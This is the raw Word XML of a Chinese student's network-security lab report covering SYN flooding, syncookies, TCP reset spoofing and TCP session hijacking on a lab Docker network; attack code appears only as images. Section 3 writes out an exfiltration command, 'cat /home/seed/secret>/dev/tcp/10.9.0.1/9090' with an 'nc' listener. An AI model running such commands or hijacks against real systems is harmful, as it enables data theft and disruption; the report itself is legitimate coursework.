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11005" w14:textId="0DD8C535" w:rsidR="00030A44" w:rsidRDefault="00030A44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7118126 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>苏恒</w:t>
      </w:r>
      <w:r w:rsidR="000B48FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF0F88">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="000B48FB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ab</w:t>
      </w:r>
      <w:r w:rsidR="001B390F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BF0F88">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>-report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470BA57B" w14:textId="0D31CA78" w:rsidR="00A10EF9" w:rsidRPr="00F62E00" w:rsidRDefault="004B0BCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14134180" w14:textId="41C49AA0" w:rsidR="009473E6" w:rsidRPr="00F6416C" w:rsidRDefault="001031A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6416C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击前</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020494A5" w14:textId="4D2973BF" w:rsidR="00432051" w:rsidRDefault="00432051">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A984D10" wp14:editId="43AA8451">
            <wp:extent cx="5274310" cy="3856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3DE7" w14:textId="33A377AC" w:rsidR="00D459EB" w:rsidRPr="00F6416C" w:rsidRDefault="00D459EB">
      <w:r w:rsidRPr="00F6416C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidR="000518EE" w:rsidRPr="00F6416C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2132C8AB" w14:textId="40C75225" w:rsidR="00C91038" w:rsidRDefault="00C91038">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="291A3682" wp14:editId="17E55F78">
            <wp:extent cx="5274310" cy="1835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35CD" w14:textId="6674C499" w:rsidR="00C91038" w:rsidRPr="00F6416C" w:rsidRDefault="00C91038">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6416C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDF5D65" w14:textId="602BEBD4" w:rsidR="00C91038" w:rsidRDefault="00C91038">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先尝试开启一个攻击进程，等待一分多钟后t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>ictim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现仍然可以进入，猜测可能是T</w:t>
      </w:r>
      <w:r>
        <w:t>CP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重发机制导致单个攻击进程无法完全阻塞容量为1</w:t>
      </w:r>
      <w:r>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的队列，因此同时开启三个攻击，等待一分钟后再次尝试t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vi</w:t>
      </w:r>
      <w:r>
        <w:t>ctim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，无法连接，如图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044891FD" w14:textId="100302CE" w:rsidR="00301347" w:rsidRDefault="00301347">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21857689" wp14:editId="071002E3">
            <wp:extent cx="5274310" cy="12515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3B2" w14:textId="22BE8C2C" w:rsidR="00C91038" w:rsidRDefault="00C91038">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过了十几秒后终于弹出了用户名输入，猜测是t</w:t>
      </w:r>
      <w:r>
        <w:t>elnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终于从攻击进程手中抢到一个空位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469384D6" w14:textId="2E6CBEC6" w:rsidR="00C91038" w:rsidRDefault="00C91038">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F1F6F35" wp14:editId="1AAB2B29">
            <wp:extent cx="5274310" cy="930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72D2" w14:textId="4344A14E" w:rsidR="009473E6" w:rsidRDefault="009473E6"/>
    <w:p w14:paraId="3AECFDF6" w14:textId="5985CC39" w:rsidR="009473E6" w:rsidRPr="00F62E00" w:rsidRDefault="009473E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF89ED0" w14:textId="4043C1E3" w:rsidR="00350F90" w:rsidRPr="00DA4E7B" w:rsidRDefault="00350F90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA4E7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用c</w:t>
      </w:r>
      <w:r w:rsidR="00DA4E7B" w:rsidRPr="00DA4E7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的s</w:t>
      </w:r>
      <w:r w:rsidR="00DA4E7B" w:rsidRPr="00DA4E7B">
        <w:t>ynflood</w:t>
      </w:r>
      <w:r w:rsidR="00DA4E7B" w:rsidRPr="00DA4E7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只开启一个攻击进程就成功实现了攻击，原因可能是c比py</w:t>
      </w:r>
      <w:r w:rsidR="00DA4E7B" w:rsidRPr="00DA4E7B">
        <w:t>thon</w:t>
      </w:r>
      <w:r w:rsidR="00DA4E7B" w:rsidRPr="00DA4E7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行速度快</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F2648C" w14:textId="74A864AC" w:rsidR="00350F90" w:rsidRDefault="00350F9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B2B0BB3" wp14:editId="782C60AD">
            <wp:extent cx="5274310" cy="711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DB21" w14:textId="0271EA99" w:rsidR="00350F90" w:rsidRDefault="00350F90">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6548A33B" wp14:editId="4E48F93A">
            <wp:extent cx="5274310" cy="1320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28D" w14:textId="77777777" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE43AD9" w14:textId="77777777" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6741ADD8" w14:textId="41CCDA6C" w:rsidR="00DA4E7B" w:rsidRPr="00F62E00" w:rsidRDefault="00DA4E7B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006BB51" w14:textId="7685E758" w:rsidR="004F024D" w:rsidRPr="00F62E00" w:rsidRDefault="00500749">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法在d</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62E00">
        <w:t>ocker</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里修改s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62E00">
        <w:t>yncookies</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为文件只读。因此直接修改y</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:t>ml</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后重新b</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:t>uild</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重新进行s</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:t>ynflood</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击并进行t</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:t>elnet</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，在v</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:t>ictim</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看建立的连接，只有t</w:t>
      </w:r>
      <w:r w:rsidR="008D2306" w:rsidRPr="00F62E00">
        <w:t>elnet</w:t>
      </w:r>
      <w:r w:rsidR="00806A13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，没有s</w:t>
      </w:r>
      <w:r w:rsidR="00806A13">
        <w:t>ynflood</w:t>
      </w:r>
      <w:r w:rsidR="00806A13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的连接</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="142A09DC" w14:textId="607CBBAF" w:rsidR="00CD23C6" w:rsidRDefault="004F024D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="383BCB04" wp14:editId="6965917F">
            <wp:extent cx="5274310" cy="1213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1D22" w14:textId="0DE15464" w:rsidR="00996641" w:rsidRPr="00F62E00" w:rsidRDefault="00F62E00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62E00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA7D2EB" w14:textId="78885847" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.6telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r>
        <w:t>10.9.0.5,wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF91E2" w14:textId="46705A69" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0957CD7E" wp14:editId="5B938C0B">
            <wp:extent cx="6154822" cy="22326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850" cy="22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54DF" w14:textId="13E2C6D6" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:r>
        <w:t>spoof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序如图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2C3C6" w14:textId="78C31781" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463DB0F6" wp14:editId="789149A4">
            <wp:extent cx="5274310" cy="13766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A4AD" w14:textId="4BA4D9A8" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3ECDB6" w14:textId="3B9CAAF9" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B0CCD52" wp14:editId="290B8FE9">
            <wp:extent cx="5274310" cy="2525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752" w14:textId="46790E97" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看w</w:t>
      </w:r>
      <w:r>
        <w:t>ireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D317F2A" w14:textId="16A7FA7D" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485D8E9C" wp14:editId="53D3794C">
            <wp:extent cx="9572956" cy="105918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32817" cy="10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5305" w14:textId="3B0820A9" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>查看1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的t</w:t>
      </w:r>
      <w:r>
        <w:t>elnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，发现已经断开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D9D8D9" w14:textId="1AD0B275" w:rsidR="00F62E00" w:rsidRDefault="00F62E00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F2027C5" wp14:editId="31DD88AA">
            <wp:extent cx="5274310" cy="1849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E08" w14:textId="21677775" w:rsidR="00F62E00" w:rsidRDefault="00F62E00"/>
    <w:p w14:paraId="195E77BB" w14:textId="58240B90" w:rsidR="007F721A" w:rsidRDefault="007F721A"/>
    <w:p w14:paraId="79DC69DA" w14:textId="17D5C888" w:rsidR="007F721A" w:rsidRDefault="007F721A"/>
    <w:p w14:paraId="7F7AD874" w14:textId="667BEC3B" w:rsidR="007F721A" w:rsidRDefault="007F721A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F721A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B228660" w14:textId="0FAC6B80" w:rsidR="007F721A" w:rsidRDefault="00C6499F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先在v</w:t>
      </w:r>
      <w:r>
        <w:t>ictim</w:t>
      </w:r>
      <w:r w:rsidR="000134ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中/</w:t>
      </w:r>
      <w:r w:rsidR="000134ED">
        <w:t>home/seed</w:t>
      </w:r>
      <w:r w:rsidR="000134ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/目录下创建s</w:t>
      </w:r>
      <w:r w:rsidR="000134ED">
        <w:t>ecret</w:t>
      </w:r>
      <w:r w:rsidR="000134ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并写入t</w:t>
      </w:r>
      <w:r w:rsidR="000134ED">
        <w:t>his is top secret</w:t>
      </w:r>
      <w:r w:rsidR="000134ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A4D3B5" w14:textId="0C4575B7" w:rsidR="00E729EC" w:rsidRDefault="00E729EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CDAF132" wp14:editId="17B8168A">
            <wp:extent cx="5274310" cy="1619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AF31" w14:textId="4F327759" w:rsidR="00E729EC" w:rsidRDefault="00E729EC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在atta</w:t>
      </w:r>
      <w:r>
        <w:t>cke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r中输入n</w:t>
      </w:r>
      <w:r>
        <w:t>c -lv 9090</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在v</w:t>
      </w:r>
      <w:r>
        <w:t>ictim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00E729EC">
        <w:t>cat /home/seed/secret&gt;/dev/tcp/10.9.0.1/9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E197BF4" w14:textId="48367B4B" w:rsidR="00E729EC" w:rsidRDefault="00E729EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25904BBC" wp14:editId="4B2E3F12">
            <wp:extent cx="5274310" cy="878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B958" w14:textId="267FFFC2" w:rsidR="00E729EC" w:rsidRDefault="00E729EC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来通过tc</w:t>
      </w:r>
      <w:r>
        <w:t>p session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持实现该效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17838AD3" w14:textId="05DAD78D" w:rsidR="00727956" w:rsidRDefault="00727956">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.6telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，查看w</w:t>
      </w:r>
      <w:r>
        <w:t>ireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378BE9C8" w14:textId="40E46D77" w:rsidR="00D55527" w:rsidRDefault="00D55527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1648569C" wp14:editId="2C7CC108">
            <wp:extent cx="5567618" cy="20250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256" cy="20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65CE" w14:textId="1172D13D" w:rsidR="00E729EC" w:rsidRDefault="002A6FFB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>构造</w:t>
      </w:r>
      <w:r w:rsidR="00345083">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F1A863" w14:textId="4906210E" w:rsidR="00345083" w:rsidRDefault="00345083">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BE9F539" wp14:editId="37AAE2E0">
            <wp:extent cx="5274310" cy="1028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C660" w14:textId="77777777" w:rsidR="00255DD9" w:rsidRDefault="00255DD9"/>
    <w:p w14:paraId="0B2EE510" w14:textId="5DA510B5" w:rsidR="002A6FFB" w:rsidRDefault="008F3569">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tt</w:t>
      </w:r>
      <w:r>
        <w:t>acker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上先开启n</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D360665" w14:textId="3D5697A8" w:rsidR="008F3569" w:rsidRDefault="008F3569">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A9BCB1" wp14:editId="6DDFCA08">
            <wp:extent cx="5274310" cy="307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4612" w14:textId="77777777" w:rsidR="00255DD9" w:rsidRDefault="00255DD9"/>
    <w:p w14:paraId="3E04E086" w14:textId="0D468F68" w:rsidR="008F3569" w:rsidRDefault="008F3569">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335DC5AD" w14:textId="1DE45CB0" w:rsidR="008B3235" w:rsidRDefault="008B3235">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="497C6ED8" wp14:editId="02AA5DC7">
            <wp:extent cx="5090160" cy="27656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771" cy="27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41CF" w14:textId="77777777" w:rsidR="002D32EB" w:rsidRDefault="002D32EB"/>
    <w:p w14:paraId="5CC48FEF" w14:textId="142D30B5" w:rsidR="008B3235" w:rsidRDefault="008B3235">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击成功</w:t>
      </w:r>
      <w:r w:rsidR="000C4656">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7B1B9" w14:textId="04C7C7C7" w:rsidR="00342C35" w:rsidRDefault="008B3235">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B13F9C8" wp14:editId="322413CA">
            <wp:extent cx="5954866" cy="8001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6938" cy="8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DA22" w14:textId="02883714" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="3EB59CF5" w14:textId="585340AA" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="0CE4AC8D" w14:textId="3BBC5B30" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="44032298" w14:textId="4752F91C" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="552B837C" w14:textId="015FFD80" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="5A8CB59F" w14:textId="63206F59" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="6E5CA5C9" w14:textId="735104E8" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="06361FE9" w14:textId="6572E936" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="0469A5F8" w14:textId="6410DD67" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
    <w:p w14:paraId="760AAF1A" w14:textId="12EC6DDC" w:rsidR="00EA0B7B" w:rsidRDefault="00EA0B7B"/>
